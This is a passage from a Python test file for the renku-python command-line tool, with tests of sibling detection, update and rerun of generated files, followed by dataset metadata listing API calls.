orphan.\"\"\"\n    cwd = Path(project)\n    orphan = cwd / 'orphan.txt'\n\n    cmd = ['run', 'touch', orphan.name]\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 0\n\n    cmd = ['show', 'siblings', 'orphan.txt']\n    result = runner.invoke(cli.cli, cmd)\n    assert result.exit_code == 0\n    assert 'orphan.txt\\n' == result.output\n\n\ndef 
test_only_child(runner):\n \"\"\"Test detection of an only child.\"\"\"\n cmd = ['run', 'touch', 'only_child']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n\n cmd = ['show', 'siblings', 'only_child']\n result = runner.invoke(cli.cli, cmd)\n assert result.exit_code == 0\n assert 'only_child\\n' == result.output\n\n\ndef test_siblings_update(project, runner, capsys):\n \"\"\"Test detection of siblings during update.\"\"\"\n cwd = Path(project)\n parent = cwd / 'parent.txt'\n brother = cwd / 'brother.txt'\n sister = cwd / 'sister.txt'\n siblings = {brother, sister}\n\n repo = git.Repo(project)\n\n def update_source(data):\n \"\"\"Update parent.txt.\"\"\"\n with parent.open('w') as fp:\n fp.write(data)\n\n repo.git.add('--all')\n repo.index.commit('Updated parent.txt')\n\n update_source('1')\n\n # The output files do not exist.\n assert not any(sibling.exists() for sibling in siblings)\n\n cmd = ['run', 'tee', 'brother.txt']\n\n with capsys.disabled():\n with parent.open('rb') as stdin:\n with sister.open('wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n try:\n cli.cli.main(\n args=cmd,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n # The output files are copied from the source.\n for sibling in siblings:\n with sibling.open('r') as f:\n assert f.read().strip() == '1', sibling\n\n update_source('2')\n\n # Siblings must be updated together.\n for sibling in siblings:\n assert 1 == _run_update(runner, capsys, args=('update', sibling.name))\n\n # Update brother and check the sister has not been changed.\n assert 0 == _run_update(\n runner, capsys, args=('update', '--with-siblings', brother.name)\n )\n\n for sibling in siblings:\n with sibling.open('r') as f:\n assert f.read().strip() == '2', sibling\n\n update_source('3')\n\n # Siblings are kept together even when one is removed.\n repo.index.remove([brother.name], working_tree=True)\n repo.index.commit('Brother removed')\n\n assert not brother.exists()\n\n # Update should also find missing siblings.\n assert 1 == _run_update(runner, capsys, args=('update', ))\n assert 0 == _run_update(runner, capsys, args=('update', '--with-siblings'))\n\n for sibling in siblings:\n with sibling.open('r') as f:\n assert f.read().strip() == '3', sibling\n\n\ndef test_simple_rerun(project, runner, capsys):\n \"\"\"Test simple file recreation.\"\"\"\n greetings = {'hello', 'hola', 'ahoj'}\n\n cwd = Path(project)\n source = cwd / 'source.txt'\n selected = cwd / 'selected.txt'\n\n repo = git.Repo(project)\n\n with source.open('w') as f:\n f.write('\\n'.join(greetings))\n\n repo.git.add('--all')\n repo.index.commit('Created greetings')\n\n cmd = [\n 'run', 'python', '-S', '-c',\n 'import sys, random; print(random.choice(sys.stdin.readlines()))'\n ]\n\n with capsys.disabled():\n with source.open('rb') as stdin:\n with selected.open('wb') as stdout:\n try:\n old_stdin, old_stdout = sys.stdin, sys.stdout\n sys.stdin, sys.stdout = stdin, stdout\n try:\n cli.cli.main(\n args=cmd,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdin, sys.stdout = old_stdin, old_stdout\n\n with selected.open('r') as f:\n greeting = f.read().strip()\n assert greeting in greetings\n\n def _rerun():\n \"\"\"Return greeting after rerunning.\"\"\"\n assert 0 == _run_update(runner, capsys, args=('rerun', 
str(selected)))\n with selected.open('r') as f:\n greeting = f.read().strip()\n assert greeting in greetings\n return greeting\n\n for _ in range(100):\n new_greeting = _rerun()\n if greeting != new_greeting:\n break\n\n assert greeting != new_greeting, \"Something is not random\"\n\n for _ in range(100):\n new_greeting = _rerun()\n if greeting == new_greeting:\n break\n\n assert greeting == new_greeting, \"Something is not random\"\n\n\ndef test_rerun_with_inputs(project, runner, capsys):\n \"\"\"Test file recreation with specified inputs.\"\"\"\n cwd = Path(project)\n first = cwd / 'first.txt'\n second = cwd / 'second.txt'\n inputs = (first, second)\n\n output = cwd / 'output.txt'\n\n cmd = [\n 'run', 'python', '-S', '-c', 'import random; print(random.random())'\n ]\n\n def _generate(output, cmd):\n \"\"\"Generate an output.\"\"\"\n with capsys.disabled():\n with output.open('wb') as stdout:\n try:\n old_stdout = sys.stdout\n sys.stdout = stdout\n try:\n cli.cli.main(\n args=cmd,\n prog_name=runner.get_default_prog_name(cli.cli),\n )\n except SystemExit as e:\n assert e.code in {None, 0}\n finally:\n sys.stdout = old_stdout\n\n for file_ in inputs:\n _generate(file_, cmd)\n\n cmd = ['run', 'cat'] + [str(path) for path in inputs]\n _generate(output, cmd)\n\n with output.open('r') as f:\n initial_data = f.read()\n\n assert 0 == _run_update(runner, capsys, args=('rerun', str(output)))\n\n with output.open('r') as f:\n assert f.read() != initial_data, \"The output should have changed.\"\n\n # Keep the first file unchanged.\n with first.open('r') as f:\n first_data = f.read()\n\n assert 0 == _run_update(\n runner, capsys, args=('rerun', '--from', str(first), str(output))\n )\n\n with output.open('r') as f:\n assert f.read().startswith(first_data)\n", "repo_name": "leafty/renku-python", "sub_path": "tests/test_cli.py", "file_name": "test_cli.py", "file_ext": "py", "file_size_in_byte": 27588, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "86", "api": [{"api_name": "renku.cli.cli.main", "line_number": 22, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 22, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 22, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 24, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 24, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 34, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 34, "usage_type": "name"}, {"api_name": "renku.__version__", "line_number": 35, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 41, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 41, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 38, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 38, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 48, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 48, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 59, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 59, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 63, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 64, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 64, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 66, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 66, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 66, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 67, "usage_type": "call"}, {"api_name": "os.path", "line_number": 67, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 70, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 71, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 71, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 76, "usage_type": "call"}, {"api_name": "os.path", "line_number": 76, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 76, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 78, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 78, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 80, "usage_type": "call"}, {"api_name": "os.path", "line_number": 80, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 81, "usage_type": "call"}, {"api_name": "os.path", "line_number": 81, "usage_type": "attribute"}, {"api_name": "os.chdir", "line_number": 84, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 85, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 86, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 87, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 88, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 88, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 93, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 93, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 102, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 102, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 105, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 105, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 109, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 109, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 112, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 112, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 119, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 119, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 125, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 125, "usage_type": "name"}, {"api_name": "contextlib.redirect_stdout", "line_number": 129, "usage_type": "call"}, {"api_name": "renku.cli.cli.main", "line_number": 131, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 131, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 131, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 133, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 133, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 139, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 139, "usage_type": "name"}, {"api_name": "renku.models.cwl.workflow.Workflow.from_cwl", "line_number": 144, "usage_type": "call"}, {"api_name": "renku.models.cwl.workflow.Workflow", "line_number": 144, "usage_type": "name"}, {"api_name": "yaml.load", 
"line_number": 144, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 148, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 148, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 149, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 149, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 158, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 170, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 170, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 171, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 171, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 173, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 173, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 173, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 175, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 175, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 180, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 180, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 185, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 185, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 188, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 188, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 197, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 197, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 211, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 212, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 214, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 214, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 214, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 216, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 216, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 221, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 226, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 228, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 228, "usage_type": "name"}, {"api_name": "git.Repo", "line_number": 232, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 241, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 242, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 244, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 244, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 244, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 246, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 246, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 251, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 259, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 264, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 280, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 281, "usage_type": "attribute"}, {"api_name": "sys.stdout", 
"line_number": 281, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 284, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 284, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 284, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 286, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 286, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 291, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 291, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 296, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 296, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 301, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 301, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 306, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 306, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 315, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 315, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 320, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 320, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 327, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 327, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 336, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 337, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 339, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 339, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 339, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 343, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 348, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 348, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 355, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 355, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 357, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 361, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 361, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 365, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 366, "usage_type": "call"}, {"api_name": "os.path", "line_number": 366, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 366, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 371, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 371, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 377, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 381, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 381, "usage_type": "name"}, {"api_name": "os.path.dirname", "line_number": 383, "usage_type": "call"}, {"api_name": "os.path", "line_number": 383, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 392, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 392, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 394, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 403, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 403, 
"usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 410, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 410, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 412, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 430, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 430, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 437, "usage_type": "call"}, {"api_name": "os.path", "line_number": 437, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 438, "usage_type": "call"}, {"api_name": "os.path", "line_number": 438, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 439, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 440, "usage_type": "call"}, {"api_name": "os.path", "line_number": 440, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 446, "usage_type": "call"}, {"api_name": "os.path", "line_number": 446, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 449, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 449, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 451, "usage_type": "call"}, {"api_name": "git.Repo.init", "line_number": 453, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 453, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 473, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 473, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 483, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 483, "usage_type": "call"}, {"api_name": "os.path", "line_number": 483, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 484, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 485, "usage_type": "call"}, {"api_name": "os.path", "line_number": 485, "usage_type": "attribute"}, {"api_name": "renku.cli.cli", "line_number": 490, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 490, "usage_type": "name"}, {"api_name": "os.stat", "line_number": 497, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 498, "usage_type": "call"}, {"api_name": "os.path", "line_number": 498, "usage_type": "attribute"}, {"api_name": "os.stat", "line_number": 500, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 501, "usage_type": "call"}, {"api_name": "os.path", "line_number": 501, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 509, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 510, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 511, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 511, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 514, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 514, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 524, "usage_type": "call"}, {"api_name": "os.mkdir", "line_number": 525, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 530, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 532, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 532, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 536, "usage_type": "call"}, {"api_name": "renku.cli.cli", 
"line_number": 538, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 538, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 542, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 544, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 544, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 548, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 550, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 550, "usage_type": "name"}, {"api_name": "contextlib.redirect_stdout", "line_number": 557, "usage_type": "call"}, {"api_name": "renku.cli.cli.main", "line_number": 559, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 559, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 559, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 561, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 561, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 566, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 566, "usage_type": "name"}, {"api_name": "os.chdir", "line_number": 570, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 574, "usage_type": "call"}, {"api_name": "os.chdir", "line_number": 576, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 577, "usage_type": "call"}, {"api_name": "subprocess.call", "line_number": 578, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 580, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 580, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 587, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 587, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 591, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 591, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 600, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 601, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 603, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 603, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 603, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 607, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 612, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 613, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 615, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 615, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 615, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 620, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 625, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 629, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 645, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 645, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 655, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 655, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 676, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 676, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 681, "usage_type": "attribute"}, {"api_name": "renku.cli", 
"line_number": 681, "usage_type": "name"}, {"api_name": "renku._compat.Path", "line_number": 693, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 697, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 697, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 701, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 701, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 709, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 709, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 713, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 713, "usage_type": "name"}, {"api_name": "renku._compat.Path", "line_number": 720, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 726, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 747, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 747, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 748, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 748, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 750, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 750, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 750, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 752, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 752, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 757, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 757, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 800, "usage_type": "call"}, {"api_name": "git.Repo", "line_number": 804, "usage_type": "call"}, {"api_name": "sys.stdin", "line_number": 821, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 821, "usage_type": "attribute"}, {"api_name": "sys.stdin", "line_number": 822, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 822, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 824, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 824, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 824, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 826, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 826, "usage_type": "name"}, {"api_name": "sys.stdin", "line_number": 831, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 831, "usage_type": "attribute"}, {"api_name": "renku._compat.Path", "line_number": 862, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 878, "usage_type": "attribute"}, {"api_name": "sys.stdout", "line_number": 879, "usage_type": "attribute"}, {"api_name": "renku.cli.cli.main", "line_number": 881, "usage_type": "call"}, {"api_name": "renku.cli.cli", "line_number": 881, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 881, "usage_type": "name"}, {"api_name": "renku.cli.cli", "line_number": 883, "usage_type": "attribute"}, {"api_name": "renku.cli", "line_number": 883, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 888, "usage_type": "attribute"}]}